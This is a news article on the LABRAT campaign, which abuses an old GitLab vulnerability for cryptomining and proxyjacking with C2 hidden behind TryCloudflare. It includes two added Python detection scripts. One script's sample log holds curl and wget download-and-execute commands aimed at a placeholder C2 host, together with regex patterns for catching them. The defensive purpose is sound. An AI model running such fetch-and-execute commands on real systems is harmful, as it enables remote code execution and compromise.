Proxyjacking trend continues as attackers abuse years-old GitLab vulnerability


Cyber security researchers have uncovered a stealthy operation, dubbed LABRAT, that combines cryptomining and proxyjacking to generate income, with its command-and-control traffic hidden behind legitimate services.

Both the stealthy approach and the addition of financially motivated proxyjacking set this campaign apart from other cryptomining, ransomware, and data exfiltration attacks.

The campaign makes use of a 2021 vulnerability in GitLab - CVE-2021-22205 - to enable remote command execution on a victim’s server. CVE-2021-22205 itself was patched by GitLab in 2021, meaning the impact is restricted to customers remaining on vulnerable versions.

Once the vulnerability is exploited, the attacker executes a simple curl command to download a malicious script from a command and control (C2) server. The script disables defenses, downloads malicious binaries, and attempts lateral movement.

Proxyjacking has grown in popularity throughout 2023 and is a way for criminals to monetize a victim’s infrastructure or, as researchers put it, “‘rent’ the compromised system to a proxy network”. 

While the technique isn’t a novel one, putting it to use strictly for monetary gain is a practice only recently observed.

Effectively, the compromised IP address is sold, and the affected system is put to work. While cryptomining can result in financial damages if not detected and stopped quickly, the reputational damage from proxyjacking, should the compromised infrastructure be put to work in an attack or other criminal activities, can be significant.

Because proxyjacking uses only a fraction of the system load that cryptomining does, and consumes spare bandwidth rather than CPU, it is difficult to detect.
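The detection difficulty described above follows from what proxyjacking consumes: little CPU, a lot of bandwidth. A CPU-only alert, the usual cryptomining tell, therefore misses it. The following is an added illustration (not Sysdig's tooling or anything from the report) of a heuristic that baselines each host's outbound bytes from its earlier samples and separates a low-CPU egress jump from a high-CPU spike. All telemetry, host names and thresholds are constructed for the example.

```python
"""Heuristic for proxyjacking-style resource use.

Added example, not Sysdig's detection logic. Proxyjacking uses only a
fraction of the CPU that cryptomining does and instead consumes spare
bandwidth, so a CPU-only alert misses it. This script baselines each host's
outbound bytes per interval from its earlier samples and separates three
cases: high CPU (cryptomining-like), low CPU with a large egress jump
(proxyjacking-like), and normal. All telemetry below is constructed.
"""
from dataclasses import dataclass
from statistics import median


@dataclass(frozen=True)
class Sample:
    host: str
    ts: int          # interval start, seconds (constructed)
    cpu_pct: float   # mean CPU utilisation over the interval
    tx_bytes: int    # bytes sent over the interval


def _series(host, cpu_then, tx_then, cpu_now, tx_now, n=4, step=60):
    """Build n baseline samples followed by n recent samples for one host."""
    out = [Sample(host, i * step, cpu_then, tx_then) for i in range(n)]
    out += [Sample(host, (n + i) * step, cpu_now, tx_now) for i in range(n)]
    return out


# Constructed telemetry for three hosts (bytes per 60 s interval):
# git-01 keeps CPU low but its egress jumps 20x (proxyjacking-like);
# build-02 pins the CPU with unchanged egress (cryptomining-like);
# web-03 is steady.
SAMPLES = (
    _series("git-01", 5.0, 2_000_000, 8.0, 40_000_000)
    + _series("build-02", 10.0, 2_000_000, 95.0, 2_100_000)
    + _series("web-03", 12.0, 2_000_000, 14.0, 2_200_000)
)


def classify_host(samples, window=4, egress_factor=5.0,
                  cpu_low=25.0, cpu_high=80.0):
    """Classify one host's samples, using the last `window` samples as 'recent'
    and everything before them as the baseline."""
    samples = sorted(samples, key=lambda s: s.ts)
    if len(samples) <= window:
        return "insufficient-data"
    base, recent = samples[:-window], samples[-window:]
    base_tx = median(s.tx_bytes for s in base)
    recent_tx = median(s.tx_bytes for s in recent)
    recent_cpu = median(s.cpu_pct for s in recent)
    if recent_cpu >= cpu_high:
        return "cryptomining-suspect"
    if recent_cpu < cpu_low and base_tx > 0 and recent_tx >= egress_factor * base_tx:
        return "proxyjacking-suspect"
    return "normal"


def classify_all(samples, **kwargs):
    """Group samples by host and classify each host."""
    by_host = {}
    for s in samples:
        by_host.setdefault(s.host, []).append(s)
    return {host: classify_host(hs, **kwargs) for host, hs in sorted(by_host.items())}


if __name__ == "__main__":
    for host, verdict in classify_all(SAMPLES).items():
        print(f"{host}: {verdict}")
```

The medians keep a single noisy interval from triggering an alert; in practice the baseline would come from days of data rather than four samples, and the egress factor would be tuned per host role, since a build server or a backup host legitimately bursts.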


Sysdig previously noted the potential financial rewards from proxyjacking in a report in April, where access was gained via the Log4j vulnerability rather than the GitLab exploit used in this instance. It estimated that the passive income from the 100 compromised IP addresses documented then could be as much as $1,000 per month.

Akamai also noted the rise of proxyjacking with a strict profit motive, and described it as “the latest cybercriminal side hustle”. In Akamai’s report, vulnerable SSH servers were targeted and Docker services were launched to share the victim’s bandwidth for financial gain.

How the attack works

The attackers were observed to be using two noteworthy techniques in order to obscure their activities. 

One is an attempt to obfuscate their C2 location by using subdomains on the trycloudflare.com domain. The domain is a legitimate one operated by Cloudflare but, according to researchers, is also used by attackers.

“Using the legitimate TryCloudFlare infrastructure can make it difficult for defenders to identify it as malicious, especially if it is used in normal operations,” said researchers at Sysdig.

Researchers also noted the use of compiled binaries, written in Go and .NET, rather than simpler-to-create scripts. This approach, according to Miguel Hernandez, threat research engineer at Sysdig, “allowed them to hide more effectively”.
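Two of the observable traits described in this article, the initial curl download-and-execute step and the use of trycloudflare.com subdomains for C2, can be turned into simple log rules. The script below is an added example, not Sysdig's detection content or anything from the LABRAT report: it parses constructed key=value audit lines (a made-up format, not a real product's) and flags both patterns, raising severity when the shell was spawned from a GitLab process. The host names, domains and allowlist are placeholders.

```python
"""Detection logic for two indicators described in the article.

Added example, not Sysdig's detection content. It parses constructed
key=value audit lines (not a real product format) and flags:
  1. a download-and-execute pattern (curl/wget piped into a shell), the
     first post-exploitation step described for LABRAT;
  2. DNS lookups for subdomains of trycloudflare.com from hosts that are not
     expected to use Cloudflare tunnels, the C2 masking technique described.
Hosts and domains in the sample lines are placeholders.
"""
import re
import shlex

# Hosts that legitimately use Cloudflare tunnels (assumption: maintained by
# the defender; the placeholder dev box below is the only entry).
TUNNEL_ALLOWLIST = {"dev-42"}

DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b")
TRYCLOUDFLARE = re.compile(r"(?:^|\.)trycloudflare\.com$", re.IGNORECASE)

# Constructed sample log; ".invalid" domains are reserved placeholders.
SAMPLE_LOG = """\
2023-08-17T10:00:01Z host=git-01 type=exec parent=gitlab-workhorse cmd="curl -s http://c2-placeholder.invalid/x.sh | sh"
2023-08-17T10:00:03Z host=git-01 type=dns qname=example-tunnel.trycloudflare.com
2023-08-17T10:00:07Z host=web-03 type=exec parent=cron cmd="curl -s https://updates.example.invalid/list.txt -o /tmp/list.txt"
2023-08-17T10:00:09Z host=dev-42 type=dns qname=my-dev-tunnel.trycloudflare.com
2023-08-17T10:00:11Z host=web-03 type=dns qname=cdn.example.invalid
2023-08-17T10:00:12Z host=git-01 type=exec parent=bash cmd="wget -qO- http://c2-placeholder.invalid/y.sh|bash"
"""


def parse_line(line):
    """Split 'ts key=value ...' into a dict; shlex keeps quoted cmd= values whole."""
    parts = shlex.split(line)
    event = {"ts": parts[0]}
    for tok in parts[1:]:
        key, _, value = tok.partition("=")
        event[key] = value
    return event


def check_event(event):
    """Return (host, rule, severity, evidence) or None for one parsed event."""
    host = event.get("host", "?")
    if event.get("type") == "exec":
        cmd = event.get("cmd", "")
        if DOWNLOAD_EXEC.search(cmd):
            # A shell spawned from a GitLab process matches the described
            # post-exploitation path, so rate it higher than a generic hit.
            severity = "high" if event.get("parent", "").startswith("gitlab") else "medium"
            return (host, "download-and-execute", severity, cmd)
    elif event.get("type") == "dns":
        qname = event.get("qname", "")
        if TRYCLOUDFLARE.search(qname) and host not in TUNNEL_ALLOWLIST:
            return (host, "trycloudflare-subdomain", "medium", qname)
    return None


def detect(log_text):
    """Run both rules over every non-empty line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hit = check_event(parse_line(line))
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for host, rule, severity, evidence in detect(SAMPLE_LOG):
        print(f"[{severity}] {host} {rule}: {evidence}")
```

The allowlist is the important part of the second rule: TryCloudflare is a legitimate service, which is exactly why it makes good cover, so the rule is only useful where the defender knows which hosts are expected to talk to it.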

The goals of the attack are cryptomining and proxyjacking; the researchers noted that the proxyjacking service used was Russian-affiliated.

The attack is a reminder both of the importance of keeping systems up to date, since a 2021 GitLab vulnerability was exploited here, and of the stealth employed by some threat actors. The financial reward was proportional to the amount of time the malicious code persisted.

How does the proxyjacking service get installed?

The operation makes use of private GitLab repositories to host the malicious binaries required. In this instance, the open source tool Global Socket - which has legitimate uses - is used to provide a backdoor. 

The proxyjacking service itself is related to a new Russian proxyware service called ProxyLite[.]ru, according to initial research by the team. Interestingly, the service makes use of .NET Core and works on multiple platforms. It is also heavily obfuscated. The team reported that the resulting DLL was undetectable by VirusTotal at time of report writing.

However, a drawback of this approach is that victims must have the .NET Core libraries in order for the binaries to run.

Of the cryptomining and proxyjacking aims in today’s report, Hernandez said: “These may not be the only goals of the attacker as their malware gives them backdoor access to the compromised systems”.

“This kind of access could lend itself to other attacks, such as data theft, leaks, or ransomware”.

Richard Speed
Staff Writer
